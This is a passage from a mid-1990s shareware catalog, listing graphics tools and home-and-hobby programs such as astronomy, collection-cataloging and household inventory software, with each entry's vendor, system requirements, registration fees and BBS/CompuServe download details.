offers (see page 6). + Look for: FFGCU.ZIP on BBSs; FFGCU.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 7 (or contact userID 72103,505 for + assistance). + Download size: 41k (about three minutes with a 2400 baud modem) + Description: + Allows you to convert and metafiles and icon images into bitmap + format, suitable for use with any program that can read bitmap + images. Also allows you to scale metafiles to smaller and + + Chapter 14, "Graphics" 508 + + + + larger sizes. Many of today's graphic images are sold and + distributed in Windows metafile formats, making it impossible + to use the images in programs that require bitmap images. This + solves the problem! + + + Product: Gif+Web Transparent GIF Editor + Transparent GIF Editor. See full description on page 481. + + Product: Image'n'Bits + Image enhancement program for Windows. See full description on + page 477. + + Product: Jasc Media Center + Multimedia file cataloging. See full description on page 505. + + Product: Paint Shop + Image displayer, converter, editor. scrn cap. See full + description on page 477. + + Product: Paint Shop Pro + Complete painting image creation editing tool. See full + description on page 485. + + Product: PrintGL + Pen plotter emulator package. See full description on page 78. + + Product: SCP + Screen capture & print text to bitmap. See full description on + page 69. + + Product: TIFFmaker + Author: Informatik Inc., 610.640.0339 + Version: 1.10 (12-10-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $49.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; TIFMAKER.ZIP on + CompuServe in CIS:WINAV forum LIBrary 7 (or contact userID + 76534,1166 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Converts text files to TIFF files for inclusion in document + imaging applications. Group 4 compression. Operates as online + program or as 'driver' module. + + Chapter 14, "Graphics" 509 + + + + Product: VuGrafix Image Viewer + Graphic Image Viewer, Editor, Thumbnail. See full description + on page 479. + + + 14.9 Software tools & add-ins + + 14.9.1 For multiple programs + + Product: QUIK-INSTALL + 7k application install program! Many features. See full + description on page 412. + + 14.9.2 For AutoCAD + + Product: REALIZE + Full converter from .DXF to POV raytracer. See full + description on page 498. + + Product: TommySoftware CAD/DRAW 4 Level1 + The 32bit verison of the CAD shareware stand. See full + description on page 483. + + Chapter 15, "Home & hobby" 510 + + + + + + Chapter 15 + Home & hobby + + See also: Finances, Personal finances; Business, Work-at-home. + + + 15.1 Arts & crafts + + Product: Quilt + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.32 (04-09-92) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; disks of other + shareware; discounts on other products. + Look for: availability unknown on BBSs; QUILT.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 5 (or contact userID 76703,3046 for + assistance). + SWREG#: 322 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A diverting graphics program or nonresident screen saver, using + half square quilting patterns. You can create specific + patterns or set the program to continuously change patterns. + Change widths, patterns, rotate or flip the designs, or colors + for "billions and billions" of combinations. Configurable color + palettes (v1.1 lets you set 8 colors at a time) chosen from 64 + possible colors. Ages 8 to 88. + + + 15.2 Astronomy + + Product: clySmic Lunar Almanack + Author: clySmic Software + Version: 2.22 (11-30-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $9.95 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; LUNA.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 76156,164 for + assistance). + Download size: 346k (about 26 minutes with a 2400 baud modem) + Description: + Displays the current moon phase; rising, southing, and setting + times, the constellation & signe of the moon, and more. Easy to + use, with beautiful, colorful graphical display with moon icons + + Chapter 15, "Home & hobby" 511 + + + + and scanned bitmaps. Can be run as an icon displaying the moon + phase only. Takes advantage of >16-color displays if present. + + + Product: Lunar Taskbar Almanack + Lunar Taskbar Almanack in Icon Form. See full description on + page 121. + + Product: SkyMap + Author: Christopher A. Marriott, 612-322-5868 + Version: 2.1 (07-01-94) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: math coprocessor. + Registration fee: $36.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + lifetime limited return policy; bonus data; all ASP-wide offers + (see page 6); discounts on upgrades. + Look for: SKYMP*.ZIP on BBSs (multiple files); SKYMP*.ZIP on + CompuServe in CIS:ASTROFORUM forum LIBrary 7 (multiple files) + (or contact userID 100113,1140 for assistance). + SWREG#: 876 + Download size: 1300k (about 97 minutes with a 2400 baud modem) + Description: + A highly accurate "Planetarium" for Windows 3.1 or better. It + can display a map of the sky, as seen from anywhere on Earth, + for any date between 4000BC and 8000AD. The program can display + stars, planets, comets, and "deep sky" objects such as star + clusters, nebulae and galaxies. Extensive information about any + object on the map can be obtained simply by clicking on it, and + pictures can be displayed. High-quality maps can be printed on + any printer supported by Windows. + + + 15.3 Computers + + See also: Education, Computers. + + Product: Computer System Manager + Tracks computer system hardware/software. See full description + on page 220. + + Product: DAZZLE + EGA/VGA super-kaleidoscope, image generator. See full + description on page 487. + + Product: Palette Adjuster + Adjusts the colors on your VGA monitor. See full description + on page 60. + + Chapter 15, "Home & hobby" 512 + + + + Product: Super!Market + Author: Trulli Tops Software, Inc., 216-974-5189 + Version: 1.30 (04-05-96) + Needs: IBM PC, Windows 3.0 or better. Hard disk. + Strongly recommended: HP LaserJet printer; Postscript printer. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of phone, CompuServe, mail support; 1-month + return policy; all ASP-wide offers (see page 6). 12-month free + upgrading allowed. + Look for: SUPMKT*.ZIP on BBSs (call 703-680-9269 to download it + at no charge); SUP130.ZIP on CompuServe in CIS:WINDOWS forum + LIBrary 7 (or contact userID 70700,3555 for assistance). + SWREG#: 10896 + PsL#: 11080 + Download size: 329k (about 25 minutes with a 2400 baud modem) + Description: + A Windows-based home productivity product used to create a + shopping list that includes prices and aisle numbers. The list + can be printed in aisle sequence with or without pricing + information. Exploits the advantages of windows facilities in + Windows or OS/2 so that operations are quick and accurate. + International customization is allowed for currency type, + decimal style, and date presentation. + + + Product: Teleshare/DOS Remote Access + Basic DOS remote control. See full description on page 379. + + Product: WORDS + Spell words using falling letters. See full description on + page 627. + + + 15.4 Collecting + + Product: AlbumMaster + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 8.50 (09-01-94) + Needs: IBM PC, DOS 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + + Chapter 15, "Home & hobby" 513 + + + + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: ALBM850.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ALMSTR.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 76 + Download size: 261k (about 20 minutes with a 2400 baud modem) + Description: + Designed for audiophiles who want to catalog their albums and + produce professional looking printouts, the program is easy to + use and powerful. Standard entries for title, artist, album + number, category, and tunes plus 3 user defined fields! The + user can obtain printouts for criteria or all, and can search + for all fields or combination, even tunes! Printouts include: + an abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, and a complete tune listing! + + + Product: AlbumMaster For Windows + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 2.10 (09-01-94) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $33.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; bonus graphics; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: ALBMW210.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ALBMW.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 2511 + Download size: 882k (about 66 minutes with a 2400 baud modem) + Description: + Designed for audiophiles who want to catalog their albums and + produce professional looking printouts, the program is easy to + use and powerful. Standard entries for title, artist, album + number, category, and tunes plus 3 user defined fields! The + user can obtain printouts for criteria or all, and can search + for all fields or combination, even tunes! Printouts include: + an abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, and a complete tune listing! + + + Product: Book Librarian + Book cataloging program. See full description on page 443. + + Product: Car Restoration Diary + Data tracking for vintage auto restoration. See full + description on page 220. + + Chapter 15, "Home & hobby" 514 + + + + Product: CassetteMaster + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 9.10 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: CASM910.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CMSTR.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 77 + Download size: 261k (about 20 minutes with a 2400 baud modem) + Description: + Designed for users who want to catalog their cassettes and + produce professional looking printouts, the program is easy to + use and powerful. Standard entries for title, artist, tape + number, category, and tunes plus 3 user defined fields! The + user can obtain printouts for criteria or all, and can search + for all fields or combination, even tunes! Printouts include: + an abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, or J Card style case inserts & + a tune list! + + + Product: CassetteMaster For Windows + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 2.10 (09-01-94) + Needs: IBM PC, Windows 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + + Chapter 15, "Home & hobby" 515 + + + + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: CASW210.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CMSTRW.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 3697 + Download size: 872k (about 65 minutes with a 2400 baud modem) + Description: + Designed for users who want to catalog their cassettes and + produce professional looking printouts, the program is easy to + use and powerful. Standard entries for title, artist, tape + number, category, and tunes plus 3 user defined fields! The + user can obtain printouts for criteria or all, and can search + for all fields or combination, even tunes! Printouts include: + an abbreviated listing, full catalog, a custom lisiting, 3X5 + and Rolodex cards, front labels, or J Card style case inserts & + a tune list! + + + Product: CDMaster + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 8.60 (09-01-94) + Needs: IBM PC, DOS 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics or + Laser printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: CDM860.ZIP on BBSs (call 317-784-2147 to download it at + no charge); CDMSTR.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 7 (or contact userID 70272,3317 for assistance). + SWREG#: 78 + Download size: 341k (about 26 minutes with a 2400 baud modem) + Description: + CD lovers need a program as sophisticated as the format itself + to catalog their collections. This is the answer! The program + is easy to use and powerful. Standard entries for title, + artist, CD number, category, and tunes (plus 3 user defined + fields! The user can obtain printouts for criteria or all, and + can search for all fields or combination, even tunes! Printouts + include: an abbreviated listing, full catalog, a custom + lisiting, 3X5 and Rolodex cards, front labels, and a complete + tune list! + + Chapter 15, "Home & hobby" 516 + + + + Product: CDMaster For Windows + The BeZT CD library ever! See full description on page 551. + + Product: Cellar Master for Windows + Author: Fugue Software (David Noakes), +61-7-3824-2843 + Version: 1.0 r1 (02-22-96) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $20.00 (add $12.00 for shipping to U.S. + addresses) (add $12.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). Removal of shareware screens. + Look for: availability unknown on BBSs; WINES.ZIP on CompuServe + in CIS:WINEFORUM forum LIBrary 0 (or contact userID 100036,311 + for assistance). + Download size: 997k (about 74 minutes with a 2400 baud modem) + Description: + Do you need to keep track of the bottles in your wine cellar? + Do you want instant access to your tasting notes? Would you + like to be able to maintain a list of wines to drink or taste + soon? Would you like to be able to identify future tasting + needs? Would you like to locate a particular bottle without + hunting through your entire cellar, unpacking and repacking + boxes of your valuable bottles? Would you like to print a list + of all your bottles with valuations for insurance purposes? You + need this! + + + Product: EZ-Index - Popular Photography + Index for Popular Photography Magazine. See full description + on page 557. + + Product: EZ-Index - Canadian Geographic + Index for Canadian Geographic magazine. See full description + on page 444. + + Chapter 15, "Home & hobby" 517 + + + + Product: EZ-Index - National Geographic + Author: E-Z Access Software Ltd. (Leo Taylor), 506-529-3432 + Version: 1.90 (10-10-95) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer; XMS memory. + Registration fee: $7.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, BBS, + CompuServe, mail support; 3-month return policy; discounts on + other products; discounts on upgrades. + Look for: NGINDX10.ZIP on BBSs (call 506-529-4067 to download it + at no charge); NGINDX10.ZIP on CompuServe in CIS:COLLECT forum + LIBrary 9 (or contact userID 74002,1261 for assistance). + SWREG#: 7960 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + Index of the articles published in the magazine from Jan/1990 + to the present. Features: word search, print and color options + with keywords and an install procedure. The articles are + categorized by subject matter and the geographical location if + applicable: Archaeology, Biology, Environment, Texas, London, + etc. Available in 8 versions beginning with January 1950. + Windows 3.1/95 setup instructions provided. Great for + collectors and subscribers. + + Chapter 15, "Home & hobby" 518 + + + + Product: EZ-Index for Traveler + Author: E-Z Access Software Ltd. (Leo Taylor), 506-529-3432 + Version: 1.90 (10-10-95) + Needs: IBM PC, DOS 3.1 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Epson printer; EMS memory; XMS + memory. + Registration fee: $7.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, BBS, + CompuServe, mail support; 3-month return policy; discounts on + other products; discounts on upgrades. + Look for: TRINDX10.ZIP on BBSs (call 506-529-4067 to download it + at no charge); TRINDX10.ZIP on CompuServe in CIS:COLLECT forum + LIBrary 9 (or contact userID 74002,1261 for assistance). + SWREG#: 8003 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A reference index for the National Geographic "Traveler" + Magazine. The registered copy of the index lists the articles + published between January, 1990 to the present. The index is + available in two versions, v1.90 and v1.84, from Spring, 1984 + to the present. KEYWORDS have been added to help locate + articles of interest: Hiking/Flying/ Spain/Texas, etc. + FEATURES: word search, print & color options, install & un- + install. Windows 3.1/95 setup instructions provided. + + + Product: Household Register + Author: TurboSystemsCo (Lemuel D. Turner), 404-516-8575 + Version: 3.12 (12-27-93) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $34.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, GEnie + support. + Look for: HR312.ZIP on BBSs (call 703-680-9269 to download it at + no charge); HR.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 72427,1603 for assistance); HR312.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID L.TURNER1 + for assistance). + Download size: 183k (about 14 minutes with a 2400 baud modem) + Description: + Excellent easy-to-use menu-driven home/office inventory program + holds upto 99,999 items and can use an unlimited number of + databases. Includes complete database management functions and + full featured report printing. Lists reports to screen, + + Chapter 15, "Home & hobby" 519 + + + + printer or disk. A valuation report prints your inventory and a + summary of total items by category, location or owner. Features + pop-up pick lists; on-line help; warranty lists showing + warranty expiration dates, a sample database and much more. + + + Product: MCBase + Author: Harry Doldersum, NL-(0)74-2668480 + Version: 2.3b (04-05-96) + Needs: IBM PC, DOS 3.0 or better. 590k RAM; Hard disk. + Strongly recommended: VGA monitor; Mouse; Epson printer; EMS + memory; XMS memory; math coprocessor. + Registration fee: $47.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited fax, CompuServe, + newsletter, mail support; bonus utilities; discounts on other + products; discounts on upgrades; registration commissions. + 6-month free upgrading allowed. + Look for: MCB23B.ZIP on BBSs; MCBASE.ZIP on CompuServe in + CIS:COLLECT forum LIBrary 16 (or contact userID 100270,2132 for + assistance). + SWREG#: 1636 + PsL#: 11341 + Download size: 296k (about 22 minutes with a 2400 baud modem) + Description: + A fully event driven, mouse controlled, object oriented, + dBaseIII+ compatible, relational-to-the-max, windowing database + management system, with handy dialogs & picklists and very + flexible configuration preferences. + + The only REAL database system for the music collector. + + + Product: ScrollZ + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 2.10 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); 3 months of unlimited + phone, fax, BBS, CompuServe, mail support; all ASP-wide offers + (see page 6); disks of other shareware; discounts on other + + Chapter 15, "Home & hobby" 520 + + + + products. Lifetime free upgrading allowed. 99 free update + disk(s) sent out. + Look for: SCRLZ210.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SCROLZ.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + Download size: 262k (about 20 minutes with a 2400 baud modem) + Description: + A great way to track all of your printed matter; be it + magazines, comics, books, graphic novels, newspapers, + newsletters, anything! All in one easy to use system. Input + screens designed with specific needs in mind, even a NoteZ + section for recording your own thoughts and comments! Prints + listings, catalogs, 3X5 or Rolodex cards, custom listings, and + even a statistical breakdown of your collection! Cross + reference by any of the fields or combination. Find by any + field or combination, even NoteZ! + + + Product: SmartTracker Books + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 2.5 (12-20-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; Hard + disk. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy; all ASP-wide offers + (see page 6). + Look for: TKB250.ZIP on BBSs; TKBOOK.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Track, organize and catalog your book collection. Select + category or personal rating. Enter title, author, publisher, + year published, cost, value, ISBN, date purchased, where + purchased and description. Modify the categories and ratings to + your personal liking. Advanced search facility. Create 1-line, + 2-line or multi-line reports sorted by title, author, category + or personal rating. Narrow reports down to one category or + personal rating. View or print. + + Chapter 15, "Home & hobby" 521 + + + + Product: SmartTracker Coins + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 2.5 (12-20-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM. + Strongly recommended: Hard disk; Mouse. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, mail support; 3-month limited return policy; all + ASP-wide offers (see page 6). + Look for: TKC250.ZIP on BBSs; TKCOIN.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Track, organize and catalog your coin collection. Designed to + be easy enough for the beginner and complete enough for the + experienced. Select country, category and condition. Enter face + value, purchase price, market value, premium value, mint year + and more. Indicate special features like commemorative, + controller coin, gold and silver. Modify country and category + lists to your liking. Help to decipher common inscriptions, + explain conditions, controller coins and more. Search and + reports facilities. + + + Product: SmartTracker Stamps + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 2.5 (12-20-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk. + Strongly recommended: Mouse. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, mail support; 3-month limited return policy; all + ASP-wide offers (see page 6). + Look for: TKS250.ZIP on BBSs; TKSTMP.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Track, catalog and organize your stamp collection. Easy for the + beginner and complete enough for the experienced. Select + country, topic, condition, type, group and cancellation. Enter + face value, market value, description, catalog number, comments + and more. Indicate special features like overprint, first day + cover, pen cancellation and more. Modify country and topic + lists to personal liking. Help for identifying stamps. + + Chapter 15, "Home & hobby" 522 + + + + Explanations for conditions, groupings and more. Search and + reports. + + + Product: SmartTracker Videos + Track, catalog & organize your videos. See full description on + page 549. + + Product: SoundZ + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 4.00 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Hard disk. IBM Graphics printer. + Strongly recommended: HP LaserJet printer; Mouse. + Registration fee: $45.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: SOUNDZ4.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SOUNDZ.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 63 + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + Designed for audiophiles who have multiple formats for their + collections (cassettes, CDs, 45s, 78s, LPs, and reel to reels). + It is more in depth than any of the other audio program. So, if + you need more than a basic catalog then this is for you! + Standard entries for title, artist, reference number, category, + price/value, date of purchase, date of origin, unlimited number + of songs per side (with notes entries for each!), and a text + liner NoteZ field of up to 5000 lines. + + + Product: SoundZ For Windows + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 2.15 (03-09-95) + Needs: IBM PC, Windows 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Hard disk. IBM Graphics printer. + Strongly recommended: HP LaserJet printer; Mouse. + Registration fee: $45.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + + Chapter 15, "Home & hobby" 523 + + + + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: SDZW215.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SNDZW.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 3696 + Download size: 950k (about 71 minutes with a 2400 baud modem) + Description: + Designed for audiophiles who have multiple formats for their + collections (cassettes, CDs, 45s, 78s, LPs, and reel to reels). + It is more in depth than any of the other audio program. So, if + you need more than a basic catalog then this is for you! + Standard entries for title, artist, reference number, category, + price/value, date of purchase, date of origin, unlimited number + of songs per side (with notes entries for each!), and a text + liner NoteZ field of up to 5000 lines. PLUS save scanned cover + art! + + + Product: VideoMaster + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 9.00 (11-29-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: VIDM900.ZIP on BBSs (call 317-784-2147 to download it + at no charge); VIDM.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 61 + Download size: 244k (about 18 minutes with a 2400 baud modem) + Description: + To help user catalog their video tapes and assist user in + printing catalogs, standard and user customized listings and + labels for the spine and front of the tape. Entries for tape + number, title, rating, start point, star, costar, three user + defined entries and up to 5000 line synopsis as well as + category. User can find any tape by any field or combination. + Can handle up to multiple titles on a single tape, file only + being limited by disk space. Great for the home video buff! + + Chapter 15, "Home & hobby" 524 + + + + Product: VideoMaster For Windows + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 2.21 (04-19-96) + Needs: IBM AT (80286), Windows 3.0 or better. 330k RAM; CGA + monitor; Hercules monitor; Dual 720k floppy drives. IBM + Graphics printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: VIDW221.ZIP on BBSs (call 317-784-2147 to download it + at no charge); VIDM4W.ZIP on CompuServe in CIS:UNICORN forum + LIBrary 18 (or contact userID 70272,3317 for assistance). + SWREG#: 4969 + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + To help user 